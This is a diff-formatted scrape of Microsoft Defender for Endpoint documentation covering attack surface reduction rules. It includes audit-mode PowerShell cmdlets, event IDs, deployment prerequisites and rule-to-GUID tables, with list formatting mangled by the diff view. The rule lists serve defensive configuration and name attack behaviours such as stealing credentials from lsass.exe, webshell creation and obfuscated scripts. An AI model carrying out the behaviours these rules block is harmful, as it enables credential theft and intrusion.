-You can use PowerShell - as an alternative to Intune - to enable attack surface reduction rules in audit mode to view a record of apps that would have been blocked if the feature was fully enabled. You can also get an idea of how often the rules fire during normal use.
-
-To enable an attack surface reduction rule in audit mode, use the following PowerShell cmdlet:
-
-```PowerShell
-Add-MpPreference -AttackSurfaceReductionRules_Ids <rule ID> -AttackSurfaceReductionRules_Actions AuditMode
-```
-
-Where `<rule ID>` is a [GUID value of the attack surface reduction rule](attack-surface-reduction-rules-reference.md).
-
-To enable all the added attack surface reduction rules in audit mode, use the following PowerShell cmdlet:
-
-```PowerShell
-(Get-MpPreference).AttackSurfaceReductionRules_Ids | Foreach {Add-MpPreference -AttackSurfaceReductionRules_Ids $_ -AttackSurfaceReductionRules_Actions AuditMode}
-```
-
-> [!TIP]
-> If you want to fully audit how attack surface reduction rules will work in your organization, you'll need to use a management tool to deploy this setting to devices in your network(s).
-
-You can also use Group Policy, Intune, or mobile device management (MDM) configuration service providers (CSPs) to configure and deploy the setting. Learn more in the main [Attack surface reduction rules](attack-surface-reduction.md) article.
-
-<a name='use-windows-event-viewer-review-as-an-alternative-to-the-attack-surface-reduction-rules-reporting-page-in-the-microsoft-365-defender-portal'></a>
-
-## Use Windows Event Viewer Review as an alternative to the attack surface reduction rules reporting page in the Microsoft Defender portal
-
-To review apps that would have been blocked, open Event Viewer and filter for Event ID 1121 in the Microsoft-Windows-Windows Defender/Operational log. The following table lists all network protection events.
-
-Event ID | Description
--|-
- 5007 | Event when settings are changed
- 1121 | Event when an attack surface reduction rule fires in block mode
- 1122 | Event when an attack surface reduction rule fires in audit mode
-
-## Other articles in this deployment collection
-
-[Attack surface reduction rules deployment overview](attack-surface-reduction-rules-deployment.md)
-
-[Plan attack surface reduction rules deployment](attack-surface-reduction-rules-deployment-plan.md)
-
-[Enable attack surface reduction rules](attack-surface-reduction-rules-deployment-implement.md)
-
-[Operationalize attack surface reduction rules](attack-surface-reduction-rules-deployment-operationalize.md)
-
-[Attack surface reduction rules reference](attack-surface-reduction-rules-reference.md)
-
security Attack Surface Reduction Rules Deployment https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-deployment.md
- Title: Microsoft Defender for Endpoint attack surface reduction rules deployment overview
-description: Provides overview and prerequisite guidance about deploying Microsoft Defender for Endpoint attack surface reduction rules. Links to articles that show how to plan and ASR deployment, test ASR rules, configure ASR rules, and enable ASR rules.
--------- Previously updated : 07/13/2023--
-# Attack surface reduction rules deployment overview
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-Attack surfaces are all the places where your organization is vulnerable to cyberthreats and attacks. Reducing your attack surface means protecting your organization's devices and network, which leaves attackers with fewer ways to attack. Configuring Microsoft Defender for Endpoint attack surface reduction rules can help.
-
-Attack surface reduction rules target certain software behaviors, such as:
--- Launching executable files and scripts that attempt to download or run files-- Running obfuscated or otherwise suspicious scripts-- Behaviors that apps don't usually occur during normal day-to-day work-
-By reducing the different attack surfaces, you can help prevent attacks from happening in the first place.
-
-This deployment collection provides information about the following aspects of attack surface reduction rules:
--- attack surface reduction rules requirements-- plan for attack surface reduction rules deployment-- test attack surface reduction rules-- configure and enable attack surface reduction rules-- attack surface reduction rules best practices-- attack surface reduction rules advanced hunting-- attack surface reduction rules event viewer-
-## Attack surface reduction rules deployment steps
-
-As with any new, wide-scale implementation, which could potentially impact your line-of-business operations, it's important to be methodical in your planning and implementation. Careful planning and deployment of attack surface reduction rules is necessary to ensure they work best for your unique customer workflows. To work in your environment, you need to plan, test, implement, and operationalize attack surface reduction rules carefully.
-
- :::image type="content" source="media/asr-rules-deployment-phases.png" alt-text="Plan Microsoft Defender for Endpoint attack surface reduction rules, test attack surface reduction rules, Enable attack surface reduction rules, maintain attack surface reduction rules." lightbox="media/asr-rules-deployment-phases.png":::
-
-## Important predeployment caveat
-
-We recommended that you enable the following three _standard protection rules_. See [Attack surface reduction rules by type](attack-surface-reduction-rules-reference.md#attack-surface-reduction-rules-by-type) for important details about the two types of attack surface reduction rules.
--- [Block credential stealing from the Windows local security authority subsystem (lsass.exe)](attack-surface-reduction-rules-reference.md#block-credential-stealing-from-the-windows-local-security-authority-subsystem)-- [Block abuse of exploited vulnerable signed drivers](attack-surface-reduction-rules-reference.md#block-abuse-of-exploited-vulnerable-signed-drivers)-- [Block persistence through Windows Management Instrumentation (WMI) event subscription](attack-surface-reduction-rules-reference.md#block-persistence-through-wmi-event-subscription)-
-Typically, you can enable the standard protection rules with minimal-to-no noticeable impact to the end user. For an easy method to enable the standard protection rules, see [Simplified standard protection option](attack-surface-reduction-rules-report.md#simplified-standard-protection-option).
-
-> [!NOTE]
-> For customers who are using a non-Microsoft HIPS and are transitioning to Microsoft Defender for Endpoint attack surface reduction rules, Microsoft advises running the HIPS solution alongside attack surface reduction rules deployment until the moment you shift from Audit mode to Block mode. Keep in mind that you must reach out to your non-Microsoft antivirus provider for exclusion recommendations.
-
-## Before you begin testing or enabling attack surface reduction rules
-
-During your initial preparation, it's vital to understand the capabilities of the systems that you put in place. Understanding the capabilities help you determine which attack surface reduction rules are most important for protecting your organization. Additionally, there are several prerequisites, which you must attend to in preparation of your attack surface reduction deployment.
-
-> [!IMPORTANT]
-> This guide provides images and examples to help you decide how to configure attack surface reduction rules; these images and examples might not reflect the best configuration options for your environment.
-
-Before you start, review [Overview of attack surface reduction](overview-attack-surface-reduction.md), and [Demystifying attack surface reduction rules - Part 1](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/demystifying-attack-surface-reduction-rules-part-1/ba-p/1306420) for foundational information. To understand the areas of coverage and potential impact, familiarize yourself with the current set of attack surface reduction rules; see [Attack surface reduction rules reference](attack-surface-reduction-rules-reference.md). While you're familiarizing yourself with the attack surface reduction rules set, take note of the per-rule GUID mappings; see [Attack surface reduction rule to GUID matrix](attack-surface-reduction-rules-reference.md#asr-rule-to-guid-matrix).
-
-Attack surface reduction rules are only one capability of the attack surface reduction capabilities within Microsoft Defender for Endpoint. This document goes into more detail on deploying attack surface reduction rules effectively to stop advanced threats like human-operated ransomware and other threats.
-
-### Attack surface reduction rules list by category
-
-The following table shows attack surface reduction rules by category:
-
-| Polymorphic threats | Lateral movement & credential theft | Productivity apps rules | Email rules | Script rules | Misc rules |
-|:|:|:|:|:|:|
-| Block executable files from running unless they meet a prevalence (1,000 machines), age, or trusted list criteria | Block process creations originating from PSExec and WMI commands | Block Office apps from creating executable content | Block executable content from email client and webmail | Block obfuscated JS/VBS/PS/macro code | Block abuse of exploited vulnerable signed drivers <sup>[[1](#fn1)]<sup></sup> |
-| Block untrusted and unsigned processes that run from USB | Block credential stealing from the Windows local security authority subsystem (lsass.exe)<sup>[[2](#fn1)]<sup></sup> | Block Office apps from creating child processes | Block only Office communication applications from creating child processes | Block JS/VBS from launching downloaded executable content | |
-| Use advanced protection against ransomware | Block persistence through WMI event subscription | Block Office apps from injecting code into other processes | Block Office communication apps from creating child processes | | |
-| | | Block Adobe Reader from creating child processes | | | |
-
-(<a id="fn1">1</a>) _Block abuse of exploited vulnerable signed drivers_ is now available under **Endpoint Security** > **Attack Surface Reduction**.
-
-(<a id="fn1">2</a>) Some attack surface reduction rules generate considerable noise, but don't block functionality. For example, if you're updating Chrome, Chrome accesses **lsass.exe**; passwords are stored in **lsass** on the device. However, Chrome shouldn't be accessing local device **lsass.exe**. If you enable the rule to block access to **lsass**, you see many events. Those events are good events because the software update process shouldn't access lsass.exe. Using this rule blocks Chrome updates from accessing **lsass**, but won't block Chrome from updating. This is also true of other applications that make unnecessary calls to **lsass.exe**. The _block access to lsass_ rule blocks unnecessary calls to **lsass**, but doesn't block the application from running.
-
-### Attack surface reduction infrastructure requirements
-
-Although multiple methods of implementing attack surface reduction rules are possible, this guide is based on an infrastructure consisting of
--- Microsoft Entra ID-- Microsoft Intune-- Windows 10 and Windows 11 devices-- Microsoft Defender for Endpoint E5 or Windows E5 licenses-
-To take full advantage of attack surface reduction rules and reporting, we recommend using a Microsoft Defender XDR E5 or Windows E5 license, and A5. Learn more at [Minimum requirements for Microsoft Defender for Endpoint](minimum-requirements.md).
-
-> [!NOTE]
-> There are multiple methods to configure attack surface reduction rules. Attack surface reduction rules can be configured using: Microsoft Intune, PowerShell, Group Policy, Microsoft Configuration Manager (ConfigMgr), Intune OMA-URI.
-> If you are using a different infrastructure configuration than what is listed for _Infrastructure requirements_, you can learn more about deploying attack surface reduction rules using other configurations here: [Enable attack surface reduction rules](enable-attack-surface-reduction.md).
-
-### Attack surface reduction rules dependencies
-
-Microsoft Defender Antivirus must be enabled and configured as primary anti-virus solution, and must be in the following mode:
--- Primary antivirus/antimalware solution-- State: Active mode-
-Microsoft Defender Antivirus must not be in any of the following modes:
--- Passive-- Passive Mode with Endpoint detection and response (EDR) in Block Mode-- Limited periodic scanning (LPS)-- Off-
-See [Cloud-delivered protection and Microsoft Defender Antivirus](cloud-protection-microsoft-defender-antivirus.md) for more.
-
-### Cloud Protection (MAPS) must be enabled to enable attack surface reduction rules
-
-Microsoft Defender Antivirus works seamlessly with Microsoft cloud services. These cloud protection services, also referred to as Microsoft Advanced Protection Service (MAPS), enhances standard real-time protection, arguably providing the best antivirus defense. Cloud protection is critical to preventing breaches from malware and a critical component of attack surface reduction rules.
-[Turn on cloud-delivered protection in Microsoft Defender Antivirus](enable-cloud-protection-microsoft-defender-antivirus.md).
-
-### Microsoft Defender Antivirus components must be current versions for attack surface reduction rules
-
-The following Microsoft Defender Antivirus component versions must be no more than two versions older than the most-currently-available version:
--- **Microsoft Defender Antivirus Platform update version** - Microsoft Defender Antivirus platform is updated monthly.-- **Microsoft Defender Antivirus engine version** - Microsoft Defender Antivirus engine is updated monthly.-- **Microsoft Defender Antivirus security intelligence** - Microsoft continually updates Microsoft Defender security intelligence (also known as, definition and signature) to address the latest threats, and to refine detection logic.-
-Keeping Microsoft Defender Antivirus versions current helps reduce attack surface reduction rules false positive results and improves Microsoft Defender Antivirus detection capabilities. For more details on the current versions and how to update the different Microsoft Defender Antivirus components visit [Microsoft Defender Antivirus platform support](microsoft-defender-antivirus-updates.md).
-
-### Caveat
-
-Some rules don't work well if unsigned, internally developed application and scripts are in high usage. It's more difficult to deploy attack surface reduction rules if code signing isn't enforced.
-
-## Other articles in this deployment collection
-
-[Test attack surface reduction rules](attack-surface-reduction-rules-deployment-test.md)
-
-[Enable attack surface reduction rules](attack-surface-reduction-rules-deployment-implement.md)
-
-[Operationalize attack surface reduction rules](attack-surface-reduction-rules-deployment-operationalize.md)
-
-[Attack surface reduction rules reference](attack-surface-reduction-rules-reference.md)
-
-## Reference
-
-### Blogs
-
-[Demystifying attack surface reduction rules - Part 1](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/demystifying-attack-surface-reduction-rules-part-1/ba-p/1306420)
-
-[Demystifying attack surface reduction rules - Part 2](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/demystifying-attack-surface-reduction-rules-part-2/ba-p/1326565)
-
-[Demystifying attack surface reduction rules - Part 3](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/demystifying-attack-surface-reduction-rules-part-3/ba-p/1360968)
-
-[Demystifying attack surface reduction rules - Part 4](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/demystifying-attack-surface-reduction-rules-part-4/ba-p/1384425)
-
-### Attack surface reduction rules collection
-
-[Overview of attack surface reduction](overview-attack-surface-reduction.md)
-
-[Use attack surface reduction rules to prevent malware infection](attack-surface-reduction.md)
-
-[Enable attack surface reduction rules - alternate configurations](enable-attack-surface-reduction.md)
-
-[Attack surface reduction rules reference](attack-surface-reduction-rules-reference.md)
-
-[Attack surface reduction FAQ](attack-surface-reduction-faq.yml)
-
-### Microsoft Defender
-
-[Address false positives/negatives in Microsoft Defender for Endpoint](defender-endpoint-false-positives-negatives.md)
-
-[Cloud-delivered protection and Microsoft Defender Antivirus](cloud-protection-microsoft-defender-antivirus.md)
-
-[Turn on cloud-delivered protection in Microsoft Defender Antivirus](enable-cloud-protection-microsoft-defender-antivirus.md)
-
-[Configure and validate exclusions based on extension, name, or location](configure-extension-file-exclusions-microsoft-defender-antivirus.md)
-
-[Microsoft Defender Antivirus platform support](microsoft-defender-antivirus-updates.md)
-
-[Overview of inventory in the Microsoft 365 Apps admin center](/deployoffice/admincenter/inventory)
-
-[Create a deployment plan for Windows](/windows/deployment/update/create-deployment-plan)
-
-[Use role-based access control (RBAC) and scope tags for distributed IT in Intune](/mem/intune/fundamentals/scope-tags)
-
-[Assign device profiles in Microsoft Intune](/mem/intune/configuration/device-profile-assign#exclude-groups-from-a-profile-assignment)
-
-### Management sites
-
-[Microsoft Intune admin center](https://endpoint.microsoft.com/#home)
-
-[Attack surface reduction](https://security.microsoft.com/asr?viewid=detections)
-
-[Attack surface reduction rules configurations](https://security.microsoft.com/asr?viewid=configuration)
-
-[Attack surface reduction rules exclusions](https://security.microsoft.com/asr?viewid=exclusions)
-
security Attack Surface Reduction Rules Reference https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference.md
- Title: Attack surface reduction rules reference
-description: Lists details about Microsoft Defender for Endpoint attack surface reduction rules on a per-rule basis.
----------- m365-security-- tier2-- mde-asr Previously updated : 04/16/2024--
-# Attack surface reduction rules reference
-
-**Applies to:**
--- [Microsoft Microsoft Defender XDR for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- Microsoft Defender Antivirus-
-**Platforms:**
--- Windows-
-This article provides information about Microsoft Defender for Endpoint attack surface reduction rules (ASR rules):
--- [ASR rules supported operating system versions](#asr-rules-supported-operating-systems)-- [ASR rules supported configuration management systems](#asr-rules-supported-configuration-management-systems)-- [Per ASR rule alert and notification details](#per-asr-rule-alert-and-notification-details)-- [ASR rule to GUID matrix](#asr-rule-to-guid-matrix)-- [ASR rule modes](#asr-rule-modes)-- [Per-rule-descriptions](#per-rule-descriptions)--
-## Attack surface reduction rules by type
-
-Attack surface reduction rules are categorized as one of two types:
--- **Standard protection rules**: Are the minimum set of rules which Microsoft recommends you always enable, while you're evaluating the affect and configuration needs of the other ASR rules. These rules typically have minimal-to-no noticeable impact on the end user.--- **Other rules**: Rules that require some measure of following the documented deployment steps [Plan > Test (audit) > Enable (block/warn modes)], as documented in the [Attack surface reduction rules deployment guide](attack-surface-reduction-rules-deployment.md)-
-For the easiest method to enable the standard protection rules, see: [Simplified standard protection option](attack-surface-reduction-rules-report.md#simplified-standard-protection-option).
-
-| ASR rule name: | Standard protection rule? | Other rule? |
-||||
-| Block abuse of exploited vulnerable signed drivers| Yes | |
-| Block Adobe Reader from creating child processes | | Yes |
-| Block all Office applications from creating child processes | | Yes |
-| Block credential stealing from the Windows local security authority subsystem (lsass.exe) | Yes | |
-| Block executable content from email client and webmail | | Yes |
-| Block executable files from running unless they meet a prevalence, age, or trusted list criterion | | Yes |
-| Block execution of potentially obfuscated scripts | | Yes |
-| Block JavaScript or VBScript from launching downloaded executable content | | Yes |
-| Block Office applications from creating executable content | | Yes |
-| Block Office applications from injecting code into other processes | | Yes |
-| Block Office communication application from creating child processes | | Yes |
-| Block persistence through WMI event subscription | Yes | |
-| Block process creations originating from PSExec and WMI commands | | Yes |
-| Block rebooting machine in Safe Mode (preview) | | Yes |
-| Block untrusted and unsigned processes that run from USB | | Yes |
-| Block use of copied or impersonated system tools (preview) | | Yes |
-| Block Webshell creation for Servers | | Yes |
-| Block Win32 API calls from Office macros | | Yes |
-| Use advanced protection against ransomware | | Yes |
-
-## Microsoft Defender Antivirus exclusions and ASR rules
-
-Microsoft Defender Antivirus exclusions apply to some Microsoft Defender for Endpoint capabilities, such as some of the attack surface reduction rules.
-
-The following ASR rules DO NOT honor Microsoft Defender Antivirus exclusions:
-
-| ASR rules name: |
-||
-| [Block Adobe Reader from creating child processes](#block-adobe-reader-from-creating-child-processes) |
-| [Block process creations originating from PSExec and WMI commands](#block-process-creations-originating-from-psexec-and-wmi-commands) |
-| [Block credential stealing from the Windows local security authority subsystem (lsass.exe)](#block-credential-stealing-from-the-windows-local-security-authority-subsystem) |
-| [Block Office applications from creating executable content](#block-office-applications-from-creating-executable-content) |
-| [Block Office applications from injecting code into other processes](#block-office-applications-from-injecting-code-into-other-processes) |
-| [Block Office communication application from creating child processes](#block-office-communication-application-from-creating-child-processes) |
-
-> [!NOTE]
-> For information about configuring per-rule exclusions, see the section titled **Configure ASR rules per-rule exclusions** in the topic [Test attack surface reduction rules](attack-surface-reduction-rules-deployment-test.md).
-
-## ASR rules and Defender for Endpoint Indicators of Compromise (IOC)
-
-The following ASR rules DO NOT honor Microsoft Defender for Endpoint Indicators of Compromise (IOC):
-
-| ASR rule name | Description |
-|||
-| Block credential stealing from the Windows local security authority subsystem (lsass.exe) | Doesn't honor indicators of compromise for files or certificates. |
-| Block Office applications from injecting code into other processes |Doesn't honor indicators of compromise for files or certificates. |
-| Block Win32 API calls from Office macros |Doesn't honor indicators of compromise for certificates. |
-
-## ASR rules supported operating systems
-
-The following table lists the supported operating systems for rules that are currently released to general availability. The rules are listed alphabetical order in this table.
-
-> [!NOTE]
->
-> Unless otherwise indicated, the minimum Windows&nbsp;10 build is version 1709 (RS3, build 16299) or later; the minimum Windows&nbsp;Server build is version 1809 or later.
->
-> Attack surface reduction rules in Windows&nbsp;Server&nbsp;2012&nbsp;R2 and Windows&nbsp;Server&nbsp;2016 are available for devices onboarded using the modern unified solution package. For more information, see [New functionality in the modern unified solution for Windows Server 2012 R2 and 2016 Preview](/microsoft-365/security/defender-endpoint/configure-server-endpoints#new-functionality-in-the-modern-unified-solution-for-windows-server-2012-r2-and-2016-preview).
-
-| Rule name| Windows&nbsp;11 <br>and<br> Windows&nbsp;10 | Windows&nbsp;Server <br> 2022 <br>and<br> Windows&nbsp;Server <br> 2019 | Windows Server | Windows&nbsp;Server <br> 2016 <sup>[[1, 2](#fn1)]<sup></sup> | Windows&nbsp;Server <br> 2012&nbsp;R2 <sup>[[1, 2](#fn1)]<sup></sup> |
-|:|::|::|::|::|::|
-| [Block abuse of exploited vulnerable signed drivers](#block-abuse-of-exploited-vulnerable-signed-drivers) | Y | Y | Y <br> version 1803 (Semi-Annual Enterprise Channel) or later | Y | Y |
-| [Block Adobe Reader from creating child processes](#block-adobe-reader-from-creating-child-processes) | Y <br> version 1809 or later <sup>[[3](#fn1)]<sup></sup> | Y | Y | Y | Y |
-| [Block all Office applications from creating child processes](#block-all-office-applications-from-creating-child-processes) | Y | Y | Y | Y | Y |
-| [Block credential stealing from the Windows local security authority subsystem (lsass.exe)](#block-credential-stealing-from-the-windows-local-security-authority-subsystem) | Y <br> version 1803 or later <sup>[[3](#fn1)]<sup></sup> | Y | Y | Y | Y |
-| [Block executable content from email client and webmail](#block-executable-content-from-email-client-and-webmail) | Y | Y | Y | Y | Y |
-| [Block executable files from running unless they meet a prevalence, age, or trusted list criterion](#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion) | Y <br> version 1803 or later <sup>[[3](#fn1)]<sup></sup> | Y | Y | Y | Y |
-| [Block execution of potentially obfuscated scripts](#block-execution-of-potentially-obfuscated-scripts) | Y | Y | Y | Y | Y |
-| [Block JavaScript or VBScript from launching downloaded executable content](#block-javascript-or-vbscript-from-launching-downloaded-executable-content) | Y | Y | Y | N | Y |
-| [Block Office applications from creating executable content](#block-office-applications-from-creating-executable-content) | Y | Y | Y | Y | Y |
-| [Block Office applications from injecting code into other processes](#block-office-applications-from-injecting-code-into-other-processes) | Y | Y | Y | Y | Y |
-| [Block Office communication application from creating child processes](#block-office-communication-application-from-creating-child-processes) | Y | Y | Y | Y | Y |
-| [Block persistence through Windows Management Instrumentation (WMI) event subscription](#block-persistence-through-wmi-event-subscription) | Y <br> version 1903 (build 18362) or later <sup>[[3](#fn1)]<sup></sup> | Y | Y <br> version 1903 (build 18362) or later | N | Y |
-| [Block process creations originating from PSExec and WMI commands](#block-process-creations-originating-from-psexec-and-wmi-commands) | Y <br> version 1803 or later <sup>[[3](#fn1)]<sup></sup> | Y | Y | Y | Y |
-| [Block rebooting machine in Safe Mode (preview)](#block-rebooting-machine-in-safe-mode-preview) | Y | Y | Y | Y | Y |
-| [Block untrusted and unsigned processes that run from USB](#block-untrusted-and-unsigned-processes-that-run-from-usb) | Y | Y | Y | Y | Y |
-| [Block use of copied or impersonated system tools (preview)](#block-use-of-copied-or-impersonated-system-tools-preview) | Y | Y | Y | Y | Y |
-| [Block Webshell creation for Servers](#block-webshell-creation-for-servers) | N | Y <br>Exchange Role Only | Y <br>Exchange Role Only | Y <br>Exchange Role Only | N |
-| [Block Win32 API calls from Office macros](#block-win32-api-calls-from-office-macros) | Y | N | N | N | N |
-| [Use advanced protection against ransomware](#use-advanced-protection-against-ransomware) | Y <br> version 1803 or later <sup>[[3](#fn1)]<sup></sup> | Y | Y | Y | Y |
-
-(<a id="fn1">1</a>) Refers to the modern unified solution for Windows Server 2012 and 2016. For more information, see [Onboard Windows Servers to the Defender for Endpoint service](configure-server-endpoints.md).
-
-(<a id="fn1">2</a>) For Windows&nbsp;Server 2016 and Windows&nbsp;Server 2012&nbsp;R2, the minimum required version of Microsoft Endpoint Configuration Manager is version 2111.
-
-(<a id="fn1">3</a>) Version and build number apply only to Windows&nbsp;10.
-
-## ASR rules supported configuration management systems
-
-Links to information about configuration management system versions referenced in this table are listed below this table.
-
-|Rule name | Microsoft Intune | Microsoft Endpoint Configuration Manager |Group Policy<sup>[[1](#fn1)]<sup></sup> | PowerShell<sup>[[1](#fn1)]<sup></sup> |
-||::|::|::|::|
-|[Block abuse of exploited vulnerable signed drivers](#block-abuse-of-exploited-vulnerable-signed-drivers) | Y | | Y | Y |
-|[Block Adobe Reader from creating child processes](#block-adobe-reader-from-creating-child-processes) | Y | | Y | Y |
-|[Block all Office applications from creating child processes](#block-all-office-applications-from-creating-child-processes) | Y |Y <br><br> CB 1710 | Y | Y |
-|[Block credential stealing from the Windows local security authority subsystem (lsass.exe)](#block-credential-stealing-from-the-windows-local-security-authority-subsystem) | Y | Y <br><br>CB 1802 | Y | Y |
-|[Block executable content from email client and webmail](#block-executable-content-from-email-client-and-webmail) | Y |Y <br><br> CB 1710 | Y | Y |
-|[Block executable files from running unless they meet a prevalence, age, or trusted list criterion](#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion) | Y | Y <br><br> CB 1802 | Y | Y |
-|[Block execution of potentially obfuscated scripts](#block-execution-of-potentially-obfuscated-scripts) | Y |Y <br><br> CB 1710 | Y | Y |
-|[Block JavaScript or VBScript from launching downloaded executable content](#block-javascript-or-vbscript-from-launching-downloaded-executable-content) | Y |Y <br><br> CB 1710 | Y | Y |
-|[Block Office applications from creating executable content](#block-office-applications-from-creating-executable-content) | Y |Y <br><br> CB 1710 | Y | Y |
-|[Block Office applications from injecting code into other processes](#block-office-applications-from-injecting-code-into-other-processes) | Y |Y <br><br> CB 1710 | Y | Y |
-|[Block Office communication application from creating child processes](#block-office-communication-application-from-creating-child-processes) | Y |Y <br><br> CB 1710 | Y | Y |
-|[Block persistence through WMI event subscription](#block-persistence-through-wmi-event-subscription) |Y | |Y | Y |
-|[Block process creations originating from PSExec and WMI commands](#block-process-creations-originating-from-psexec-and-wmi-commands) | Y | | Y | Y |
-|[Block rebooting machine in Safe Mode (preview)](#block-rebooting-machine-in-safe-mode-preview) | Y | | Y | Y |
-|[Block untrusted and unsigned processes that run from USB](#block-untrusted-and-unsigned-processes-that-run-from-usb) | Y |Y <br><br> CB 1802 | Y | Y |
-|[Block use of copied or impersonated system tools (preview)](#block-use-of-copied-or-impersonated-system-tools-preview) | Y | | Y | Y |
-|[Block Webshell creation for Servers](#block-webshell-creation-for-servers) | Y | | Y | Y |
-|[Block Win32 API calls from Office macros](#block-win32-api-calls-from-office-macros) | Y |Y <br><br> CB 1710 | Y | Y |
-|[Use advanced protection against ransomware](#use-advanced-protection-against-ransomware) | Y |Y <br><br> CB 1802 | Y | Y |
-
- (<a id="fn1">1</a>) You can configure attack surface reduction rules on a per-rule basis by using any rule's GUID.
--- [Configuration Manager CB 1710](/configmgr/core/servers/manage/updates)-- [Configuration Manager CB 1802](/configmgr/core/servers/manage/updates)-- [Microsoft Configuration Manager CB 1710](/configmgr/core/servers/manage/updates)-- [System Center Configuration Manager (SCCM) CB 1710](/configmgr/core/servers/manage/updates) <br>_SCCM is now Microsoft Configuration Manager._-
-## Per ASR rule alert and notification details
-
-Toast notifications are generated for all rules in Block mode. Rules in any other mode don't generate toast notifications.
-
-For rules with the "Rule State" specified:
--- ASR rules with \<ASR Rule, Rule State\> combinations are used to surface alerts (toast notifications) on Microsoft Defender for Endpoint only for devices at cloud block level **High**. Devices not at High cloud block level won't generate alerts for any <ASR Rule, Rule State> combinations-- EDR alerts are generated for ASR rules in the specified states, for devices at cloud block level **High+**-
-| Rule name: | Rule state: | Generates alerts in EDR? <br> (Yes&nbsp;\|&nbsp;No) | Generates toast notifications? <br> (Yes&nbsp;\|&nbsp;No) |
-||::|::|::|
-| | | _Only for devices at cloud block level **High+**_ | _In Block mode only_ and _only for devices at cloud block level **High**_|
-|[Block abuse of exploited vulnerable signed drivers](#block-abuse-of-exploited-vulnerable-signed-drivers) | | N | Y |
-|[Block Adobe Reader from creating child processes](#block-adobe-reader-from-creating-child-processes) | Block | Y | Y |
-|[Block all Office applications from creating child processes](#block-all-office-applications-from-creating-child-processes) | | N | Y |
-|[Block credential stealing from the Windows local security authority subsystem (lsass.exe)](#block-credential-stealing-from-the-windows-local-security-authority-subsystem) | | N | Y |
-|[Block executable content from email client and webmail](#block-executable-content-from-email-client-and-webmail) | | Y | Y |
-|[Block executable files from running unless they meet a prevalence, age, or trusted list criterion](#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion) | | N | Y |
-|[Block execution of potentially obfuscated scripts](#block-execution-of-potentially-obfuscated-scripts) | Audit&nbsp;\|&nbsp;Block | Y \| Y | N \| Y |
-|[Block JavaScript or VBScript from launching downloaded executable content](#block-javascript-or-vbscript-from-launching-downloaded-executable-content) | Block | Y | Y |
-|[Block Office applications from creating executable content](#block-office-applications-from-creating-executable-content) | | N | Y |
-|[Block Office applications from injecting code into other processes](#block-office-applications-from-injecting-code-into-other-processes) | | N | Y |
-|[Block Office communication application from creating child processes](#block-office-communication-application-from-creating-child-processes) | | N | Y |
-|[Block persistence through WMI event subscription](#block-persistence-through-wmi-event-subscription) | Audit&nbsp;\|&nbsp;Block | Y \| Y | N \| Y |
-|[Block process creations originating from PSExec and WMI commands](#block-process-creations-originating-from-psexec-and-wmi-commands) | | N | Y |
-|[Block rebooting machine in Safe Mode (preview)](#block-rebooting-machine-in-safe-mode-preview) | | N | N |
-|[Block untrusted and unsigned processes that run from USB](#block-untrusted-and-unsigned-processes-that-run-from-usb) | Audit&nbsp;\|&nbsp;Block | Y \| Y | N \| Y |
-|[Block use of copied or impersonated system tools (preview)](#block-use-of-copied-or-impersonated-system-tools-preview) | | N | N |
-|[Block Webshell creation for Servers](#block-webshell-creation-for-servers) | | N | N |
-|[Block Win32 API calls from Office macros](#block-win32-api-calls-from-office-macros) | | N | Y |
-|[Use advanced protection against ransomware](#use-advanced-protection-against-ransomware) | Audit&nbsp;\|&nbsp;Block | Y \| Y | N \| Y |
-
-## ASR rule to GUID matrix
-
-| Rule Name | Rule GUID |
-|:--|:--|
-| Block abuse of exploited vulnerable signed drivers | 56a863a9-875e-4185-98a7-b882c64b5ce5 |
-| Block Adobe Reader from creating child processes | 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c |
-| Block all Office applications from creating child processes | d4f940ab-401b-4efc-aadc-ad5f3c50688a |
-| Block credential stealing from the Windows local security authority subsystem (lsass.exe) | 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 |
-| Block executable content from email client and webmail | be9ba2d9-53ea-4cdc-84e5-9b1eeee46550 |
-| Block executable files from running unless they meet a prevalence, age, or trusted list criterion | 01443614-cd74-433a-b99e-2ecdc07bfc25 |
-| Block execution of potentially obfuscated scripts | 5beb7efe-fd9a-4556-801d-275e5ffc04cc |
-| Block JavaScript or VBScript from launching downloaded executable content | d3e037e1-3eb8-44c8-a917-57927947596d |
-| Block Office applications from creating executable content | 3b576869-a4ec-4529-8536-b80a7769e899 |
-| Block Office applications from injecting code into other processes | 75668c1f-73b5-4cf0-bb93-3ecf5cb7cc84 |
-| Block Office communication application from creating child processes | 26190899-1602-49e8-8b27-eb1d0a1ce869 |
-| Block persistence through WMI event subscription <br>* File and folder exclusions not supported. | e6db77e5-3df2-4cf1-b95a-636979351e5b |
-| Block process creations originating from PSExec and WMI commands | d1e49aac-8f56-4280-b9ba-993a6d77406c |
-| Block rebooting machine in Safe Mode (preview) | 33ddedf1-c6e0-47cb-833e-de6133960387 |
-| Block untrusted and unsigned processes that run from USB | b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 |
-| Block use of copied or impersonated system tools (preview) | c0033c00-d16d-4114-a5a0-dc9b3a7d2ceb |
-| Block Webshell creation for Servers | a8f5898e-1dc8-49a9-9878-85004b8a61e6 |
-| Block Win32 API calls from Office macros | 92e97fa1-2edf-4476-bdd6-9dd0b4dddc7b |
-| Use advanced protection against ransomware | c1db55ab-c21a-4637-bb3f-a12568109d35 |
-
-## ASR rule modes
